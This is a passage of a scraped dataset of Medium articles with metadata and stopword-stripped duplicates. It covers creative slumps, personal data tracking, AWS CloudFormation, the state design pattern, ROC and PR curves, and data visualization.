follow u Instagram Twitter consider supporting growth subscribing monthly Patreon giving onetime donation PayPalTags Nashville Music Interview Creativity Indie
3,824
How to Keep Being Creative When Life Feels Dull and Meaningless
Baltimore Orioles first baseman, Chris Davis, was once one of Major League Baseball’s most-feared juggernauts in the batter’s box. In both 2013 and 2015, he led the majors in home runs and held batting averages of .286 and .262, respectively. But by the end of 2018 and extending into the 2019 season, Davis led the league in another statistic, one far less dominant than the number of times he blasted a baseball out of the park — most at-bats in a row without a single hit. Yep, starting September 14, 2018, and ending April 13, 2019, Davis went 0 for 54, marking a historically abysmal stretch of his career and setting the worst hitting streak record in all of MLB history. On the day his slump finally ended, Davis rejoiced, finishing 3 for 5 with two doubles and four RBIs, raising his batting average from .000 to a whopping .079. Still abysmal, but on the rise. Slumps of Any Kind Are Humbling During the 210 days that Davis went hitless, no doubt he felt humbled and (almost) as human as the rest of us. Switching gears from baseball to creativity, “slumps” are something we all run into as humans, and they’re certainly hurdles I’ve struggled with for as long as I’ve been a writer. I have stretches of days, even weeks, when life feels uninspiring and it’s damn near impossible to type anything worthwhile onto the computer screen. Each subsequent slump I fall into, I can’t help but wonder how many more hints life needs to send me before I finally hang up my cape. I’m repeatedly plagued by the thought that: “Maybe this is a sign I should just quit.” Yet every time, I persevere and break out of the slump, usually with a piece of writing that surprises me and surpasses my wildest expectations. This begs a couple of questions — how do you continue to stay creative when life feels boring or monotonous, and how do you keep moving forward while battling through a massive slump? 1. Remind yourself it’s not the challenge you face but how you respond This holds true with everything that happens to you in life. Sometimes it’s a creative slump, other times misspelling a word in your grade school spelling bee, or reading the rejection letter from your dream college, or being broken up with by your significant other, or suffering the death of a loved one. Challenges come and go, some far more devastating than others, but each time you face one, remind yourself that, though this challenge is different from the others, it’s still just another obstacle in your path. It doesn’t matter what it is — you can’t change or control that. But you can always control how you respond to it. Don’t give up. Keep pushing. Life repeatedly tests you. It wants to try and knock you down, but the strong persevere. They get back up. They keep climbing higher. 2. Get back to the basics Too often, humans like to make things far more complicated than they need to be. Look no further than your own email inbox to prove my point. But let’s look at another example — lifting weights. Or more specifically, let’s look at my dad lifting weights. He’s just over 60 years old, and I’m proud as all hell that he’s keeping himself in shape. Looking at the guy, you’d see that he definitely has an above-average fitness level for a male his age, however, in his own world, he struggles to reach his goals in the gym. He’s one of those guys that reads tons of fitness magazines and articles online, always learning new tips, tricks, and fads for building muscle. He tries putting those complicated routines and obscure exercises into practice. The first week usually goes great — he feels sore and like he’s making progress. Shortly after, results halt and he’s right back in Slumpville. Feeling the frustration of his failures, he gets demotivated and skips workouts. “I’ll get back to it when I’m feeling more inspired next week.” And that’s the root of the problem right there. He tries to make his work too complicated and ends up breaking the cardinal rule of muscle gains — consistency. The same goes for writing and other creative endeavors. When you feel yourself lacking motivation, in a slump, or struggling to produce anything worthwhile, it’s usually a sign that you need to get back to the basics aka creating consistently. Don’t worry about what you write, or how good whatever you’re writing is. You’re not trying to be the next Ernest Hemingway during a slump, you’re just trying to survive through it. Schedule a time to write and just write. Whatever you do, don’t skip a session. Treat it like religion. Get back to the basics and put in the reps. Will it be boring and hard work? Yes, but it’s necessary to remember where you started and keep up with what got you to where you are today. 3. Consume similarly creative content Every time I find myself lacking creativity, it’s almost always because I’ve stopped ingesting similarly creative content. After all, creativity begets creativity. Other pieces of creative art act like food to fuel my own inner creativeness. But it doesn’t work when you consume just any content. For example, binge-watching an anime show on Netflix or playing Hades on the Switch rarely inspires me with new content ideas in the realm of non-fiction writing. Will I sometimes surprise myself and stumble upon an idea I can use? Sure. Does it happen often? No. If I were a screenwriter or video game developer, these might be viable ways to generate creativity, but for me as a writer, they’re traps — ways to distract or unwind more than anything. What I need to do as a writer, and what you need to do as a creator of whatever it is you create, is to consume similar pieces of creative art. I do this by reading non-fiction books, listening to podcasts, answering questions on Quora, and reading other articles on Medium. When you consume other creative pieces of art, it gets your own creative juices flowing, and ideas start erupting out of your mind like a volcano. Write these down. Write them all down. Before long, you’ll have more ideas coming to you than you’ll be able to launch out into the world. This is where you want to be as a creator — infinite backlog land. Above All, Keep Slugging Through At one point during Chris Davis’ record-breaking slump, he considered drastic action. He thought about walking away from baseball and a massive contract worth millions of dollars. To be honest, that probably would’ve been the easy way out. Easy to give up that much cash? Ok, maybe not, but for a guy who, at one time, was the best in the world, quitting the game would’ve been a surefire way to end the tormenting boos of once-adoring fans and repeatedly striking out at the plate. But as English theologian, Thomas Fuller, once said (though more recently popularized in “The Dark Knight” Batman movie): “It’s always darkest before the dawn.” And though a creative slump can sometimes feel like a lifetime of struggle and misery, it’s during those dark, monotonous times that you find out what kind of person you really are. Don’t give up. Keep slugging through.
https://medium.com/better-advice/how-to-keep-being-creative-when-life-feels-dull-and-meaningless-e37cfb4d1315
['Jason Gutierrez']
2020-12-16 06:01:23.878000+00:00
['Inspiration', 'Creativity', 'Motivation', 'Create', 'Self Improvement']
Title Keep Creative Life Feels Dull MeaninglessContent Baltimore Orioles first baseman Chris Davis one Major League Baseball’s mostfeared juggernaut batter’s box 2013 2015 led major home run held batting average 286 262 respectively end 2018 extending 2019 season Davis led league another statistic one far le dominant number time blasted baseball park — atbats row without single hit Yep starting September 14 2018 ending April 13 2019 Davis went 0 54 marking historically abysmal stretch career setting worst hitting streak record MLB history day slump finally ended Davis rejoiced finishing 3 5 two double four RBIs raising batting average 000 whopping 079 Still abysmal rise Slumps Kind Humbling 210 day Davis went hitless doubt felt humbled almost human rest u Switching gear baseball creativity “slumps” something run human they’re certainly hurdle I’ve struggled long I’ve writer stretch day even week life feel uninspiring it’s damn near impossible type anything worthwhile onto computer screen subsequent slump fall can’t help wonder many hint life need send finally hang cape I’m repeatedly plagued thought “Maybe sign quit” Yet every time persevere break slump usually piece writing surprise surpasses wildest expectation begs couple question — continue stay creative life feel boring monotonous keep moving forward battling massive slump 1 Remind it’s challenge face respond hold true everything happens life Sometimes it’s creative slump time misspelling word grade school spelling bee reading rejection letter dream college broken significant suffering death loved one Challenges come go far devastating others time face one remind though challenge different others it’s still another obstacle path doesn’t matter — can’t change control always control respond Don’t give Keep pushing Life repeatedly test want try knock strong persevere get back keep climbing higher 2 Get back basic often human like make thing far complicated need Look email inbox prove point let’s look another example — lifting weight specifically let’s look dad lifting weight He’s 60 year old I’m proud hell he’s keeping shape Looking guy you’d see definitely aboveaverage fitness level male age however world struggle reach goal gym He’s one guy read ton fitness magazine article online always learning new tip trick fad building muscle try putting complicated routine obscure exercise practice first week usually go great — feel sore like he’s making progress Shortly result halt he’s right back Slumpville Feeling frustration failure get demotivated skip workout “I’ll get back I’m feeling inspired next week” that’s root problem right try make work complicated end breaking cardinal rule muscle gain — consistency go writing creative endeavor feel lacking motivation slump struggling produce anything worthwhile it’s usually sign need get back basic aka creating consistently Don’t worry write good whatever you’re writing You’re trying next Ernest Hemingway slump you’re trying survive Schedule time write write Whatever don’t skip session Treat like religion Get back basic put rep boring hard work Yes it’s necessary remember started keep got today 3 Consume similarly creative content Every time find lacking creativity it’s almost always I’ve stopped ingesting similarly creative content creativity begets creativity piece creative art act like food fuel inner creativeness doesn’t work consume content example bingewatching anime show Netflix playing Hades Switch rarely inspires new content idea realm nonfiction writing sometimes surprise stumble upon idea use Sure happen often screenwriter video game developer might viable way generate creativity writer they’re trap — way distract unwind anything need writer need creator whatever create consume similar piece creative art reading nonfiction book listening podcasts answering question Quora reading article Medium consume creative piece art get creative juice flowing idea start erupting mind like volcano Write Write long you’ll idea coming you’ll able launch world want creator — infinite backlog land Keep Slugging one point Chris Davis’ recordbreaking slump considered drastic action thought walking away baseball massive contract worth million dollar honest probably would’ve easy way Easy give much cash Ok maybe guy one time best world quitting game would’ve surefire way end tormenting boo onceadoring fan repeatedly striking plate English theologian Thomas Fuller said though recently popularized “The Dark Knight” Batman movie “It’s always darkest dawn” though creative slump sometimes feel like lifetime struggle misery it’s dark monotonous time find kind person really Don’t give Keep slugging throughTags Inspiration Creativity Motivation Create Self Improvement
3,825
How to collect data from your life?
How to collect data from your life? A beginner’s guide to personal data Photo by Luke Chesser on Unsplash 1. Decide what’s important to you in your life Before start collecting data from your life you should decide why do you want to do it? Do you want to be more productive? Healthier? Happier? Pick one or a couple of areas in your life that you want to improve. But be careful about picking too many fields to track. You should only collect the data that you can process. The key is going steady and slow, not moving fast, and giving up early. What gets measured gets improved. — Peter Drucker After you decide why do you want to collect data and choose some areas to focus on, it is time to identify the data fields to collect. Let’s say want to focus on health, some data fields to collect can be like this: Exercised (true/false) Steps Calorie intake (kcal) Sleep time (hours) Weight (kg) Or maybe you want to track how productive you are during the week, month, or year. In this situation areas to focus on can be listed as: Focused time (minutes) Checked to-do list items (integer) Your own productivity score for the day (out of 10) Main mission (true/false) → Every morning I ask myself “If I could only do one thing today, what should I do?” That’s my main mission for that day. You can do this weekly or monthly but I found out that daily missions work the best.. These are just basic examples you can collect data from every part of your life if you think that is adding some kind of value to your life. Some people track phone screen times, their moods by the weather, their commutes, or -you probably know how popular this is- their Spotify history. You can see other types of tracking ideas in this great post. Since 2013, I have been collecting how many times I sneezed in a year. It started as a misunderstanding, I was supposed to count my blessings in life but I didn’t know that has another meaning. It started like that and now it is my icebreaker story. You can see the silly graph below. 2. Collect data regularly We are only at the stage of collecting the data from our lives. The matter of what we are going to do with the data we collected is another subject for another post. However, before doing anything with it we have to make sure it is collected properly and regularly. Consistency is very important here. If you only log data when you are feeling dull or only when you are super productive, results will not give a clear vision about your life. Every day it gets easier but you gotta do it every day. That’s the hard part. But it does get easier. — Jogging Baboon, Bojack Horseman Try to make a habit of manual data entry. Maybe you can include this in your morning/night routine. Take a cup of hot beverage and dedicate just 5 minutes a day. Create a recurring task at your to-do list app. Use the “Don’t Break the Chain” method. If daily logging is too frequent for you, maybe try weekly. Do whatever works for you to do it regularly, trust me you are going to thank yourself. Photo by Andrew Neel on Unsplash Until this point, we mostly talked about manual data logging but you also try to be as regular as possible with automatic data collection. You may think how can automatic data entry be irregular, the answer is because of you. For example, let’s say you are tracking your sleep, you have to make sure that you have your smartwatch or phone battery is enough to stay on until morning. Or you might be tracking the places you have been over the year, are you sure that you allowed Google Maps to track your location all the time? It is little things like that you should keep an eye on. But no matter how hard you try, sometimes life gets in the way, more important stuff comes up and you can lose the streak. Don’t feel discouraged, we are only human. Just try to fill the gaps as accurately as possible and continue to do what you do. This is a marathon, not a sprint. 3. Tools and systems For all the things I listed above, you can use just a pen and paper but it is almost 2021 and there are much better ways to do it. There are two main categories here. I call them trackers and databases. Trackers are self-explanatory, tools that track data from your life both automatically and manually. Databases are where all of our data sits before we process it. We shape our tools and, thereafter, our tools shape us. — John Culkin Notion Notion is my ultimate database hub and not for just data I collect, for every aspect of my life. How I use Notion as a second brain is a subject to another post but let me show you my setup for next year’s happiness and productivity tracker. I also use this as some kind of a diary. Author’s daily template So what do we have here? This is basically a template to measure how happy and how productive I felt that day. I like to use other fields to create reports at the end of the year. Reports like productivity by days of the week or happiness by exercised days. I also give each day a title like it was an episode from Friends. Such as The One with the Evil Orthodontist or The One With Phoebe’s Birthday Dinner. It is a dorky thing that I do to remember days in a fun way. This might seem like a long list to keep track of every day, but it wasn’t always like this. I started tracking my mood and general wellbeing in 2016. This document has been evolving every year since then. I would like to add some external data, like health, weather, to-do list items, or financial information but it is not possible at this moment with Notion. If you want to use external information, you can use Google Sheets as a database. Google Sheets does almost everything that Notion does but unfortunately, it doesn’t look as good as Notion. Smart watches/bands I believe that smartwatches or smart bands are a bit of luxury items. At the moment you can live just as well without them, they are not essential items for most people, unlike a smartphone. But if you have one it can help a lot to track your life. Photo by Angus Gray on Unsplash Tracking Sleep This is my favorite thing about wearable technology, a device working for you while you are sleeping. I don’t have a lot of information about how does it do that but it is great. You can check your sleep score, the average time you fall asleep at or how many times you wake up in a given night. I believe that you can use these pieces of information to make adjustments that will improve your life immensely. Tracking Steps & Location This is a no-brainer, this is the first objective of a smartwatch. Easy data logging I think removing the friction between thinking and doing is where smartwatches shine. Let’s say you are tracking the water you drink. Pulling your phone off your pocket and logging in after every glass might be a struggle but just a single tap on a screen at your wrist is almost nothing. If you are tracking a field that requires multiple manual data entries in a day, using a smartwatch can help you substantially. Apple Health App Health App that comes on iPhones by default is a tremendous database and tracker. I haven’t been on the Android ecosystem since 2014 but I think Google Fit is doing the same thing on Android devices. Health App can give you graphs and insights based on what you provided already. It can hold up lots of data for years without getting any slower and I think this is amazing. You can export all of your information if you would like to transfer on another app. It is very easy to use, just allow the app to do the work. Photo by Arek Adeoye on Unsplash Rapid fire app suggestions
https://medium.com/datadriveninvestor/collect-data-f55780ca8d49
['Emrecan Arık']
2020-12-26 08:51:01.285000+00:00
['Health', 'Productivity', 'Growth Mindset', 'Personal Development', 'Data']
Title collect data lifeContent collect data life beginner’s guide personal data Photo Luke Chesser Unsplash 1 Decide what’s important life start collecting data life decide want want productive Healthier Happier Pick one couple area life want improve careful picking many field track collect data process key going steady slow moving fast giving early get measured get improved — Peter Drucker decide want collect data choose area focus time identify data field collect Let’s say want focus health data field collect like Exercised truefalse Steps Calorie intake kcal Sleep time hour Weight kg maybe want track productive week month year situation area focus listed Focused time minute Checked todo list item integer productivity score day 10 Main mission truefalse → Every morning ask “If could one thing today do” That’s main mission day weekly monthly found daily mission work best basic example collect data every part life think adding kind value life people track phone screen time mood weather commute probably know popular Spotify history see type tracking idea great post Since 2013 collecting many time sneezed year started misunderstanding supposed count blessing life didn’t know another meaning started like icebreaker story see silly graph 2 Collect data regularly stage collecting data life matter going data collected another subject another post However anything make sure collected properly regularly Consistency important log data feeling dull super productive result give clear vision life Every day get easier gotta every day That’s hard part get easier — Jogging Baboon Bojack Horseman Try make habit manual data entry Maybe include morningnight routine Take cup hot beverage dedicate 5 minute day Create recurring task todo list app Use “Don’t Break Chain” method daily logging frequent maybe try weekly whatever work regularly trust going thank Photo Andrew Neel Unsplash point mostly talked manual data logging also try regular possible automatic data collection may think automatic data entry irregular answer example let’s say tracking sleep make sure smartwatch phone battery enough stay morning might tracking place year sure allowed Google Maps track location time little thing like keep eye matter hard try sometimes life get way important stuff come lose streak Don’t feel discouraged human try fill gap accurately possible continue marathon sprint 3 Tools system thing listed use pen paper almost 2021 much better way two main category call tracker database Trackers selfexplanatory tool track data life automatically manually Databases data sits process shape tool thereafter tool shape u — John Culkin Notion Notion ultimate database hub data collect every aspect life use Notion second brain subject another post let show setup next year’s happiness productivity tracker also use kind diary Author’s daily template basically template measure happy productive felt day like use field create report end year Reports like productivity day week happiness exercised day also give day title like episode Friends One Evil Orthodontist One Phoebe’s Birthday Dinner dorky thing remember day fun way might seem like long list keep track every day wasn’t always like started tracking mood general wellbeing 2016 document evolving every year since would like add external data like health weather todo list item financial information possible moment Notion want use external information use Google Sheets database Google Sheets almost everything Notion unfortunately doesn’t look good Notion Smart watchesbands believe smartwatches smart band bit luxury item moment live well without essential item people unlike smartphone one help lot track life Photo Angus Gray Unsplash Tracking Sleep favorite thing wearable technology device working sleeping don’t lot information great check sleep score average time fall asleep many time wake given night believe use piece information make adjustment improve life immensely Tracking Steps Location nobrainer first objective smartwatch Easy data logging think removing friction thinking smartwatches shine Let’s say tracking water drink Pulling phone pocket logging every glass might struggle single tap screen wrist almost nothing tracking field requires multiple manual data entry day using smartwatch help substantially Apple Health App Health App come iPhones default tremendous database tracker haven’t Android ecosystem since 2014 think Google Fit thing Android device Health App give graph insight based provided already hold lot data year without getting slower think amazing export information would like transfer another app easy use allow app work Photo Arek Adeoye Unsplash Rapid fire app suggestionsTags Health Productivity Growth Mindset Personal Development Data
3,826
Sleep Sweet Little One
Sign up for American Haiku Steamship To Writing History By American Haiku Writing takes practice. American Haiku is a great way to put your words from your fingers to your piece of paper. Don't quit, you can do it. Take a look
https://medium.com/american-haiku/sleep-sweet-little-baby-23a5e5389357
['Toni Tails']
2020-09-27 11:39:26.309000+00:00
['Humor', 'Mental Health', 'Creativity', 'Poetry', 'Art']
Title Sleep Sweet Little OneContent Sign American Haiku Steamship Writing History American Haiku Writing take practice American Haiku great way put word finger piece paper Dont quit Take lookTags Humor Mental Health Creativity Poetry Art
3,827
4 Great But Underrated AWS Services
1. CloudFormation CloudFormation is a service that enables us to describe infrastructure as code. Infrastructure as code is a well-known practice to set out and manage IT infrastructure through the configuration files. With CloudFormation, we can define all required components and dependencies between them. There are a few benefits to having everything in configuration files. First, it makes it possible to speed up the processes, as the task stays only within the code. No navigation between different services and connecting them through the user interface. Second, it adds more reliability and reduces human errors. The code can be reviewed by other engineers, and in case of mistake, the changes can be reverted quickly. For example, the following piece of code creates a new S3 bucket under your account: As you can see, only seven lines of code can create a new S3 bucket with a default setup at any moment. No need to do the job manually through the AWS console. CloudFormation supports two formats: JSON and YAML. Besides that, CloudFormation offers features such as nested stacks, exporting values, or passing parameters between stacks. Indeed, it is a very powerful service to maintain the whole company's infrastructure. CloudFormation is a free service and you need to pay only for provisioned components.
https://medium.com/better-programming/4-great-but-underrated-aws-services-3284ffcb6073
['Dmytro Khmelenko']
2020-10-29 16:35:07.012000+00:00
['AWS', 'Programming', 'Software Development', 'Cloud Computing', 'Cloud']
Title 4 Great Underrated AWS ServicesContent 1 CloudFormation CloudFormation service enables u describe infrastructure code Infrastructure code wellknown practice set manage infrastructure configuration file CloudFormation define required component dependency benefit everything configuration file First make possible speed process task stay within code navigation different service connecting user interface Second add reliability reduces human error code reviewed engineer case mistake change reverted quickly example following piece code creates new S3 bucket account see seven line code create new S3 bucket default setup moment need job manually AWS console CloudFormation support two format JSON YAML Besides CloudFormation offer feature nested stack exporting value passing parameter stack Indeed powerful service maintain whole company infrastructure CloudFormation free service need pay provisioned componentsTags AWS Programming Software Development Cloud Computing Cloud
3,828
Stop Using If-Else Statements
APPLIED DESIGN PATTERNS: STATE Stop Using If-Else Statements Write clean, maintainable code without if-else. You’ve watched countless tutorials using If-Else statements. You’ve probably also read programming books promoting the use of If-Else as the de facto branching technique. It’s perhaps even your default mode to use If-Else. But, let’s put an end to that right now, by replacing If-Else with the state objects. Note that you’d use this approach if you’re writing a class with methods that need its implementations to be changed depending on the current state. You’d apply another approach if you’re not dealing with an object’s changing state. Even if you’ve heard about the state pattern, you might wonder how it is implemented in production-ready code. For anyone who’s still in the dark, here’s a very brief introduction. You’ll increase complexity with any new conditional requirement implemented using If-Else. Applying the state pattern, you simply alter an objects behavior using specialized state objects instead of If-Else statements. Gone are the days with code looking like this below. Warning: PTSD trigger — also, hope you caught the logical error in here (other than the whole thing being a mess) You’ve certainly written more complicated branching before. I have for sure some years ago. The branching logic above isn’t even very complex — but try adding new conditions and you’ll see the thing explode. Also, if you think creating new classes instead of simply using branching statements sounds annoying, wait till you see it in action. It’s concise and elegant. Even better, it’ll make your codebase more SOLID, except for the “D” part tho. “Okay, I’m convinced If-Else is evil, now show me how to avoid messy branching code” We’ll be looking at how I replace If-Else branching in production-ready code. It’s a made-up example, but the approach is the same I’ve used in codebases for large clients. Let’s create a very simple Booking class, that has a few states. It’ll also have two public methods: Accept() and Cancel() . I’ve drawn a diagram to the best of my abilities that displays the different states a booking may be in. Refactoring branching logic out of our code is a three step process: Create an abstract base state class Implement each state as a separate class inheriting from base state Let the Booking ` class have a private or internal method that takes the state base class as a parameter Demo time First, we need a base state class that all states will inherit from. Notice how this base class also has the two methods, Accept and Cancel — although here they are marked as internal. Additionally, the base state has a “special” EnterState(Booking booking) method. This is called whenever a new state is assigned to the booking object. Secondly, we’re making separate classes for each state we want to represent. Notice how each class represents a state as described in the beautiful diagram above. Also, the CancelledState won’t allow our booking to transition to a new state. This class is very similar in spirit to the Null Object Pattern. Finally, the booking class itself. See how the booking class is simply delegating the implementation of Accept and Cancel to its state object? Doing this allows us to remove much of the conditional logic, and lets each state only focus on what’s important to itself — the current state also has the opportunity to transition the booking to a new state. How to deal with new conditional features? If the new feature would normally have been implemented using some conditional checking, you can now just create a new state class. It’s as simple as that. You’ll no longer have to deal with unwieldy if-else statements. How do I persist the state object in a database? You don’t. The state object is not important when saving an object to e.g. an SQL or NoSQL database. Only knowing the object’s state and how it should be mapped to a column is important. You can map a state to a friendly type name, an enum or an integer. Whatever you’re comfortable with, as long as you have some way of converting the saved value back into a state object. But you’re still using IFs? Yes — they’re essential. Especially when used as guard clauses. It’s the If-Else combination that is a root cause for maintainability headaches. It’s a lot of additional classes! Indeed. As I’ve mentioned in another article, complexity does not originate from the number of classes you have, but from the responsibilities those classes take. Having many, specialized classes will make your codebase more readable, maintainable, and simply overall more enjoyable to work with.
https://medium.com/swlh/stop-using-if-else-statements-f4d2323e6e4
['Nicklas Millard']
2020-12-15 17:42:16.136000+00:00
['Technology', 'Software Engineering', 'Csharp', 'Programming', 'Software Development']
Title Stop Using IfElse StatementsContent APPLIED DESIGN PATTERNS STATE Stop Using IfElse Statements Write clean maintainable code without ifelse You’ve watched countless tutorial using IfElse statement You’ve probably also read programming book promoting use IfElse de facto branching technique It’s perhaps even default mode use IfElse let’s put end right replacing IfElse state object Note you’d use approach you’re writing class method need implementation changed depending current state You’d apply another approach you’re dealing object’s changing state Even you’ve heard state pattern might wonder implemented productionready code anyone who’s still dark here’s brief introduction You’ll increase complexity new conditional requirement implemented using IfElse Applying state pattern simply alter object behavior using specialized state object instead IfElse statement Gone day code looking like Warning PTSD trigger — also hope caught logical error whole thing mess You’ve certainly written complicated branching sure year ago branching logic isn’t even complex — try adding new condition you’ll see thing explode Also think creating new class instead simply using branching statement sound annoying wait till see action It’s concise elegant Even better it’ll make codebase SOLID except “D” part tho “Okay I’m convinced IfElse evil show avoid messy branching code” We’ll looking replace IfElse branching productionready code It’s madeup example approach I’ve used codebases large client Let’s create simple Booking class state It’ll also two public method Accept Cancel I’ve drawn diagram best ability display different state booking may Refactoring branching logic code three step process Create abstract base state class Implement state separate class inheriting base state Let Booking class private internal method take state base class parameter Demo time First need base state class state inherit Notice base class also two method Accept Cancel — although marked internal Additionally base state “special” EnterStateBooking booking method called whenever new state assigned booking object Secondly we’re making separate class state want represent Notice class represents state described beautiful diagram Also CancelledState won’t allow booking transition new state class similar spirit Null Object Pattern Finally booking class See booking class simply delegating implementation Accept Cancel state object allows u remove much conditional logic let state focus what’s important — current state also opportunity transition booking new state deal new conditional feature new feature would normally implemented using conditional checking create new state class It’s simple You’ll longer deal unwieldy ifelse statement persist state object database don’t state object important saving object eg SQL NoSQL database knowing object’s state mapped column important map state friendly type name enum integer Whatever you’re comfortable long way converting saved value back state object you’re still using IFs Yes — they’re essential Especially used guard clause It’s IfElse combination root cause maintainability headache It’s lot additional class Indeed I’ve mentioned another article complexity originate number class responsibility class take many specialized class make codebase readable maintainable simply overall enjoyable work withTags Technology Software Engineering Csharp Programming Software Development
3,829
深入介紹及比較ROC曲線及PR曲線
深入介紹及比較ROC曲線及PR曲線 在一個二分類模型中,我們的模型通常不會直接輸出0,1直接預測出分類,而是對每個分類輸出一個機率,例如加上softmax對各分類輸出機率,這樣讓我們能夠自己設定一個門檻(threshold)來決定機率大於多少時我們判定為正樣本,反之為負樣本。而 ROC Curves 和 PR Curves 可以幫助我們分析這樣的 probablistic forcast ROC 曲線以 FPR 為 X 軸,TPR為 Y 軸,每一個點代表設定不同的門檻值所得到的不同的 FPR 及 TPR ,最後繪製成一條曲線。建議可以參考我另一篇文章所介紹的混淆矩陣,以下會再介紹如何計算出 FPR 及 TPR FPR表示成 1-特異度 而特異度(specificity)意指正確判斷出負樣本,故特異度越高、FPR越低,模型越能夠正確判斷負樣本、表現越好 TPR又稱為敏感度(Sensitivity),它也是我們熟知的召回率(Recall),也就是正確判斷出正樣本,故TPR越高則模型越能夠正確判斷正樣本、表現越好 When using normalized units, the area under the curve (often referred to as simply the AUC) is equal to the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative one (assuming ‘positive’ ranks higher than ‘negative’) — from wikipedia
https://medium.com/nlp-tsupei/roc-pr-%E6%9B%B2%E7%B7%9A-f3faa2231b8c
['Chen Tsu Pei']
2020-01-02 07:20:09.214000+00:00
['Evaluation', 'AI', 'Python', 'Classification', 'Machine Learning']
Title 深入介紹及比較ROC曲線及PR曲線Content 深入介紹及比較ROC曲線及PR曲線 在一個二分類模型中,我們的模型通常不會直接輸出01直接預測出分類,而是對每個分類輸出一個機率,例如加上softmax對各分類輸出機率,這樣讓我們能夠自己設定一個門檻threshold來決定機率大於多少時我們判定為正樣本,反之為負樣本。而 ROC Curves 和 PR Curves 可以幫助我們分析這樣的 probablistic forcast ROC 曲線以 FPR 為 X 軸,TPR為 軸,每一個點代表設定不同的門檻值所得到的不同的 FPR 及 TPR ,最後繪製成一條曲線。建議可以參考我另一篇文章所介紹的混淆矩陣,以下會再介紹如何計算出 FPR 及 TPR FPR表示成 1特異度 而特異度specificity意指正確判斷出負樣本,故特異度越高、FPR越低,模型越能夠正確判斷負樣本、表現越好 TPR又稱為敏感度Sensitivity,它也是我們熟知的召回率Recall,也就是正確判斷出正樣本,故TPR越高則模型越能夠正確判斷正樣本、表現越好 using normalized unit area curve often referred simply AUC equal probability classifier rank randomly chosen positive instance higher randomly chosen negative one assuming ‘positive’ rank higher ‘negative’ — wikipediaTags Evaluation AI Python Classification Machine Learning
3,830
Knowledge is More Than a Point of Data.
Every month, with clockwork like precision a brown paper package arrives in the mail. The unwrapping is revealing. For almost 50 years the National Geographic has been enriching my imagination. The connectedness to ourselves, to our planet and cosmos is like a lattice of human context. It’s also an important source for our visual and aesthetic literacy. I see our graphically visual world as distinctly human, whereas raw data points have no human essence. There should be no mistaking data for knowledge. Big Data, and data visualization are important topics. But it’s troubling when they’re stories reduced to little more than ill-defined link bait. Accepting there’s also no unified theory or singular definitions for either data or it’s visualization is important too. We can discern between structured (bits of ledger) and unstructured data (streams of social chatter), but data itself is simply the columns and rows fodder. It’s the slices of pie in that fill a chart. Spreadsheets and pie charts are meaningless artifacts. It’s the art of asking questions that brings them to life. Transforming crumbs of data into information, in turn gets us to the possibility of knowing. Without structure, data doesn’t become knowledge. It’s like looking into a murky swamp and trying to understand the dividing properties of an amoeba. Try viewing it in a petri dish instead. Appreciating when there’s no structure, there’s no meaning attracted me to Manual Lima’s book Visual Complexity. It’s influenced my appreciation of visual literacy. It was also cool seeing Mentionmapp on page 153. With a historical context and framework of techniques and best practices, Visual Complexity also help me discover other visualization leaders (who we’ll write about in future posts). Lima’s depiction of the visualize network being “the syntax of a new language,” made an impression. Knowing that sight is the translational interface between a visual object and a textual relationship, was my… “ahhh, that’s it moment.” When data intersects with visual science, there needs to be an aesthetic anchoring for knowledge to surface. There has to be an art to the science. Lima shares this Matt Woolman quote; “functional visualizations are more than statistical analyses and computation algorithms. They must make sense to the users and require a visual language systems that uses colour, shape, line, hierarchy, and composition to communicate clearly and appropriately, much like the alphabetic and character based languages used worldwide between humans.” From his TED2015 talk Lima says, “we can see this shift from trees into networks in many domains of knowledge. This metaphor of the network, is really already adopting various shapes and forms, and it’s almost becoming a growing visual taxonomy.” Watch Manuel Lima: A visual history of human knowledge Using data and revealing a world of stories is an art. I’m appreciative of how Lima communicates the aesthetic value of visualization. Turning the complex and the chaotic into meaningful social, political, economic, and human insights is essential. We can’t get so lost in the science of data that we forget the importance of allowing our eyes, and allowing ourselves to both revel in it, and to discover knowledge in the art of data. Conceptual artist Katie Lewis devises elaborate methods of recording data about herself, be it sensations felt by various body parts or other other aspects of life’s minutiae plotted over time using little more than pins, thread and pencil marked dates. The artworks themselves are abstracted from their actual purpose, and only the organic forms representing the accumulation data over time are left. She describes her process as being extremely rigid, involving the creation of strict rules on how data is collected, documented, and eventually transformed into these pseudo-scientific installations. From the pen of John (cofounder) Please visit Mentionmapp today!
https://medium.com/mentionmapp/knowledge-is-more-than-a-point-of-data-dc31f94a1a4
['Mentionmapp Analytics']
2016-10-30 21:57:16.840000+00:00
['Manuel Lima', 'Data Science', 'Data Visualization', 'Big Data', 'Design']
Title Knowledge Point DataContent Every month clockwork like precision brown paper package arrives mail unwrapping revealing almost 50 year National Geographic enriching imagination connectedness planet cosmos like lattice human context It’s also important source visual aesthetic literacy see graphically visual world distinctly human whereas raw data point human essence mistaking data knowledge Big Data data visualization important topic it’s troubling they’re story reduced little illdefined link bait Accepting there’s also unified theory singular definition either data it’s visualization important discern structured bit ledger unstructured data stream social chatter data simply column row fodder It’s slice pie fill chart Spreadsheets pie chart meaningless artifact It’s art asking question brings life Transforming crumb data information turn get u possibility knowing Without structure data doesn’t become knowledge It’s like looking murky swamp trying understand dividing property amoeba Try viewing petri dish instead Appreciating there’s structure there’s meaning attracted Manual Lima’s book Visual Complexity It’s influenced appreciation visual literacy also cool seeing Mentionmapp page 153 historical context framework technique best practice Visual Complexity also help discover visualization leader we’ll write future post Lima’s depiction visualize network “the syntax new language” made impression Knowing sight translational interface visual object textual relationship my… “ahhh that’s moment” data intersects visual science need aesthetic anchoring knowledge surface art science Lima share Matt Woolman quote “functional visualization statistical analysis computation algorithm must make sense user require visual language system us colour shape line hierarchy composition communicate clearly appropriately much like alphabetic character based language used worldwide humans” TED2015 talk Lima say “we see shift tree network many domain knowledge metaphor network really already adopting various shape form it’s almost becoming growing visual taxonomy” Watch Manuel Lima visual history human knowledge Using data revealing world story art I’m appreciative Lima communicates aesthetic value visualization Turning complex chaotic meaningful social political economic human insight essential can’t get lost science data forget importance allowing eye allowing revel discover knowledge art data Conceptual artist Katie Lewis devise elaborate method recording data sensation felt various body part aspect life’s minutia plotted time using little pin thread pencil marked date artwork abstracted actual purpose organic form representing accumulation data time left describes process extremely rigid involving creation strict rule data collected documented eventually transformed pseudoscientific installation pen John cofounder Please visit Mentionmapp todayTags Manuel Lima Data Science Data Visualization Big Data Design
3,831
Revolver changed my life
